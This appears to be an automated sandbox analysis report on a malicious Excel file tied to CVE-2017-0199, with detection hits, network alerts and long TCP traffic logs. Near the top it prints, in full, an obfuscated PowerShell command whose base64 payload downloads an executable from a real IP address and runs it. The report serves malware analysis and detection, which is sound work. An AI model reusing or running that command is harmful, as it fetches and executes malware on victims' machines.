CommandLine: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgI
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3704, TargetFilename: C:\Users\user\AppData\Local\Temp\yj2q5n4t.xgg.ps1

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYstEm32\windowSpoWerSHell\V1.0\pOWeRSHelL.exe" "POWeRShELL -ex bYpaSS -NOP -W 1 -c DEvIcEcreDEnTiAlDepLoymENt.exE ; iEX($(iEX('[sYsTem.TeXt.ENcOdiNG]'+[cHaR]58+[ChAR]0X3A+'Utf8.gETSTRing([SySTeM.cOnVERt]'+[chAr]0x3a+[ChaR]58+'FrOMbASE64StRInG('+[ChAr]0X22+'JFZrYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJERUZpbmlUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxtT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBna1ZRa2xsWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2hjcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga1ZQd3ZTLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWl5cVNOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKTmopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInRkeklWbkpaQllrIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFLeVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVmthOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMjE0LzkwMi93YWxuZXh0LmV4ZSIsIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSIsMCwwKTtzdEFSVC1zTGVFcCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.cmdline", ProcessId: 3920, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-28T11:21:27.619196+010020241971A Network Trojan was detected107.175.113.21480192.168.2.2249164TCP
        2024-10-28T11:21:30.631566+010020241971A Network Trojan was detected107.175.113.21480192.168.2.2249166TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-28T11:21:27.619176+010020244491Attempted User Privilege Gain192.168.2.2249164107.175.113.21480TCP
        2024-10-28T11:21:30.631541+010020244491Attempted User Privilege Gain192.168.2.2249166107.175.113.21480TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-28T11:22:52.726485+010028032702Potentially Bad Traffic192.168.2.2249168199.217.106.226443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxReversingLabs: Detection: 21%
        Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxJoe Sandbox ML: detected

        Phishing

        barindex
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\niceworkingthingswithgreatthingsevengetbackwithgoodnews[1].hta, type: DROPPED
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.217.106.226:443 -> 192.168.2.22:49168 version: TLS 1.2
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.pdbhP source: powershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\muz5o0kx\muz5o0kx.pdb source: powershell.exe, 00000005.00000002.444388800.0000000003546000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_004062A3 FindFirstFileA,FindClose,11_2_004062A3
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,11_2_00405768
        Source: C:\Users\user\AppData\Roaming\wlanext.exeCode function: 11_2_004026FE FindFirstFileA,11_2_004026FE

        Software Vulnerabilities

        barindex
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
        Source: global trafficDNS query: name: qrisni.me
        Source: global trafficDNS query: name: qrisni.me
        Source: global trafficDNS query: name: www.bookinginfo.asia
        Source: global trafficDNS query: name: www.bookinginfo.asia
        Source: global trafficDNS query: name: www.bookinginfo.asia
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 199.217.106.226:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 107.175.113.214:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.113.214:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
